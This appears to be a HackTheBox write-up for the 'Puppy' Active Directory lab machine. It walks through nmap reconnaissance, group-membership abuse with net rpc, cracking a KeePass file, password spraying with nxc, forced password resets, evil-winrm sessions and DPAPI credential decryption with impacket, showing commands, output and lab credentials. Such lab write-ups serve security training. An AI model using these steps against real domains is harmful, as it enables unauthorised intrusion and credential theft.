HackTheBox Puppy Writeup
A walkthrough of the HackTheBox 'Puppy' machine. This write-up covers initial access, privilege escalation, and post-exploitation techniques.
As is common in real life pentests, you will start the Puppy box with credentials for the following account:
levi.james / KingofAkron2025!
RECONNAISSANCE
Nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
└─$ nmap -sC -sV 10.129.132.40
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-18 08:06 EDT
Nmap scan report for 10.129.132.40
Host is up (0.14s latency).
Not shown: 985 filtered tcp ports (no-response)
Bug in iscsi-info: no string output.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-18 19:06:41Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2049/tcp open nlockmgr 1-4 (RPC #100021)
3260/tcp open iscsi?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
-sC for default scripts,-sV for version enumeration.
Using given credentail we can list the smb share on the host
From output, key thing to look is there exist one non default share DEV and we donot have any access to this share.
With given credential, lets use bloodhound-python to dump info about the domain.
Then lets import the data of bloodhound-python ingestor into bloodhound gui.
We can see user levi.james is member of HR group and HR group has GenericWrite permission on Developers group.
Lets use, GenericWrite permission to add user levi.james into Developers group.
1
net rpc group addmem "Developers" "levi.james" -U "puppy.htb"/"levi.james"%"KingofAkron2025!" -S 10.129.132.40
Lets confirm if we have successfully added the user to Developers group.
1
net rpc group members "Developers" -U "puppy.htb"/"levi.james"%"KingofAkron2025!" -S 10.129.132.40
User successfully added to Developers group.
After this, if we check the share permission, we now have read access to DEV share on which we didnt have read permission before.
Using smbclient lets view the contents of DEV Share.
There is some juicy content in the share, lets download it to our device.
A .kdbx file is an encrypted database file used by KeePass, a password management application.
Using keepass4brute tool, I was able to crack the kdbx file
Then I imported recovery.kdbx into Keepass App and used the cracked password to open the database.
Inside the database I foundsome credentials.
After this, I dumped username of the domain using netexec tool.
Then, I saved the usernames into users.txt and saved the password from keepass into pass.txt Using netexec tool I tried all combination of users and password.
1
nxc smb 10.129.132.40 -u users.txt -p pass.txt 10.129.132.40 --continue-on-success
And I got working credential ant.edwards:Antman2025!
In the bloodhound gui, I found user ant.edwards is member of Senior devs group.
On further exploration, I found Senior devs has GenericAll permission on Adam.silver user.
## GenericAll Abuse
Another thing to notice is, user ant.edwards user is disabled. To abuse genericall permission to force change password, we first need to enable the account.
To enable the account, I created enable.ldif file with following content
1
2
3
4
dn: CN=Adam D. Silver,CN=USERS,DC=PUPPY,DC=HTB
changetype: modify
replace: userAccountControl
userAccountControl: 512
Then I used ldapmodify as
1
ldapmodify -x -D "ant.edwards@puppy.htb" -w 'Antman2025!' -H ldap://10.129.132.40 -f enable.ldif
now account is enabled, lets force change password. ![alt text]assets/img/post_media/(image14.png)
1
2
3
4
net rpc password "Adam.Silver" "newP@ssword2022" -U "puppy.htb"/"ant.edwards"%"Antman2025!" -S 10.129.132.40
nxc smb 10.129.132.40 -u adam.silver -p 'newP@ssword2022'
Going more deeper, we can see user adam.silver is member of Remote Management Users group. So I tried to get win-rm session and succed.
1
evil-winrm -u adam.silver -p 'newP@ssword2022' -i 10.129.132.40
Privilege Escalation
With winrm session, I looked for any intersting files and found Backups folder inside C:
This backups folder contains sime site backup zip file.
Inside the zip file, there contains nms-auth-config.xml.bak
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?xml version="1.0" encoding="UTF-8"?>
<ldap-config>
<server>
<host>DC.PUPPY.HTB</host>
<port>389</port>
<base-dn>dc=PUPPY,dc=HTB</base-dn>
<bind-dn>cn=steph.cooper,dc=puppy,dc=htb</bind-dn>
<bind-password>ChefSteph2025!</bind-password>
</server>
<user-attributes>
<attribute name="username" ldap-attribute="uid" />
<attribute name="firstName" ldap-attribute="givenName" />
<attribute name="lastName" ldap-attribute="sn" />
<attribute name="email" ldap-attribute="mail" />
</user-attributes>
<group-attributes>
<attribute name="groupName" ldap-attribute="cn" />
<attribute name="groupMember" ldap-attribute="member" />
</group-attributes>
<search-filter>
<filter>(&(objectClass=person)(uid=%s))</filter>
</search-filter>
</ldap-config>
From this file we get the credential for steph.cooper user. With this user I got the win-rm session
1
evil-winrm -u steph.cooper -p 'ChefSteph2025!' -i 10.129.132.40
DPAPI Exploitation
Following this wonderfull resource for DPAPI Exploitation
I downloaded both credential and masterkeys
Then I used Impacket’s dpapi tool to decrypt the masterkey
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(dollarboysushil㉿kali)-[~/Documents/HTB_BOXES/puppy]
└─$ impacket-dpapi masterkey -file 556a2412-1275-4ccf-b721-e6a0b4f90407 -sid S-1-5-21-1487982659-1829050783-2281216199-1107 -password 'ChefSteph2025!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[MASTERKEYFILE]
Version : 2 (2)
Guid : 556a2412-1275-4ccf-b721-e6a0b4f90407
Flags : 0 (0)
Policy : 4ccf1275 (1288639093)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)
Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
Then I used the decrypted key to grab the credential
1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(dollarboysushil㉿kali)-[~/Documents/HTB_BOXES/puppy]
└─$ impacket-dpapi credential -file C8D69EBE9A43E9DEBF6B5FBD48B521B9 -key 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[CREDENTIAL]
LastWritten : 2025-03-08 15:54:29
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target : Domain:target=PUPPY.HTB
Description :
Unknown :
Username : steph.cooper_adm
Unknown : FivethChipOnItsWay2025!
With this steph.cooper_adm user’s credential, I got administrator access on the box.
